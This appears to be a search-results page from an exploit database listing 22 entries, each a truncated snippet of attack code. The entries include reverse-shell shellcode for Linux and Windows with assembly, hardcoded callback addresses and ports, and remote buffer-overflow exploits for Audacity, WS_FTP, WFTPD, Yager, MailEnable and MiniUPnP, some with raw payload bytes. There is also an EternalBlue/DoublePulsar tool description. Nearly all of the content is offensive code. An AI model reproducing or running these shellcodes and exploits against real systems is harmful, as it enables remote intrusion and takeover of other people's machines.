22 matches found
Exploit for CVE-2017-0144
This repository is an offensive tool for Windows. It is an implementation of the DoublePulsar backdoor in C/C++. The tool includes a suite of exploits and detectors for various vulnerabilities, including the EternalBlue vulnerability CVE-2017-0144. The tool can be used to upload a DLL to a...
Linux/MIPS - N32 MSB Reverse Shell Shellcode
/ mipsn32msblinuxrevsh.c - MIPS N32 MSB Linux reverse Copyright c 2022 Marco Ivaldi Basic MIPS N32 MSB Linux reverse shellcode, showcasing various techniques to avoid badchars. Cross-compile https://buildroot.org/ with: $ mips64-linux-gcc -static mipsn32msblinuxrevsh.c -o revsh Tested on Linux...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)
/ Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.34-v7+ 1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux pi@raspberrypi: $ lsbrelease -a No LSB modules are...
Linux/x86 - Reverse UDP Shellcode (668 bytes)
Linux/x86 - Reverse UDP Shellcode 668 bytes. Shellcode exploit for Linx86 platform ; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might...
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with the port ; it sleeps and then tries to recconect default 3 seconds ; ;shell =...
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
Linux/x86-64 - Reverse Shell Shellcode IPv6 113 bytes. Shellcode exploit for Linx86-64 platform BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with t...
Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
/ ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit x86 ; Assemble reversebash.nasm file: nasm -f elf32 -o...
Linux/x86-64 - Reverse Shell Shellcode (84 bytes)
/ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes Author: Manuel Mancera @sinkmanu Tested on: 3.16.0-4-amd64 1 SMP Debian 3.16.39-1 2016-12-30 x8664 GNU/Linux ----------------- Assembly code ------------------- section .text global start start: push 0x2d01a8c0 ; Address 192.168.1.45 push...
Linux/x86 - TCP Reverse Shellcode (75 bytes)
/ Linux x86 TCP Reverse Shellcode 75 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 75 SLAE - 750 ------------c prog ---poc by sajith shetty---------- include include include include int mainvoid int sockfiledes; struct sockaddrin sockad; //1 create socket connection //Man page:...
Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)
/ Title : Linux x8664 reverse tcp ipv6 Date : 04-05-2016 Author : Roziul Hasan Khan Shifat Tested on : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax 400083: 6a 06 push 0x6 400085: 6a 01 push 0x1 400087: 6a 0a push 0xa 400089: 5f pop rdi...
MiniUPnP igd_desc_parse.c buffer overflow
No description provided by source. TALOS-CAN-0035 CVE 2015-6031 exploit by Aleksandar Nikolic illustrating the SSP bypass with a stack buffer overflow in an application that uses pthreads. import socket import struct SSDP reply to MSEARCH request, specifies the location URL reply = """HTTP/1.1 20...
Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes
No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...
Audacity 1.2 - .gro Universal Buffer Overflow (Egghunter)
Audacity 1.2 - .gro Universal Buffer Overflow Egghunter !/usr/bin/env python Audacity print " + Creating eviL .gro file..." buff = "\x44" 174 buff += "\xEB\x08\x90\x90" buff += "\x22\x23\x17\x01" buff += "\x90" 4 buff += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
!/usr/bin/env python Audacity print " + Creating eviL .gro file..." buff = "\x44" 174 buff += "\xEB\x08\x90\x90" buff += "\x22\x23\x17\x01" buff += "\x90" 4 buff += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x57\x30\x30\x54" this is the egg...
WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================================= WSFTP LE 5.08 PASV response Remote Buffer Overflow Exploit ============================================================= / wsexp.c WSFTP LE 5.08 PASV response 0day buffer overflo...
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
/ wftpdexp.c WFTPD server 3.23 SIZE 0day remote buffer overflow exploit coded by h07 tested on XP SP2 polish, 2000 SP4 polish example.. C:\wftpdexp 0 0 192.168.0.2 h07 open 192.168.0.1 4444 WFTPD server 3.23 SIZE 0day remote buffer overflow exploit coded by h07 FTP response: 331 Give me your...
windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes
Exploit for win32 platform in category shellcode ================================================================== Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes ================================================================== We use the PEB for the Output/Input/Error...
Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow / Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... --...
MailEnable Enterprise 1.x Imapd Remote Exploit
No description provided by source. / +--=--------------------------x0n3-h4ck Team Presents---------------------------=--+ +--= =--+ +--= MailEnable Enterprise = 1.04Professional = 1.54 remote Imapd exploit =--+ +--= =--+ +--= Bug discovered by..: Corryl [email protected] =--+ +--= Exploit coded...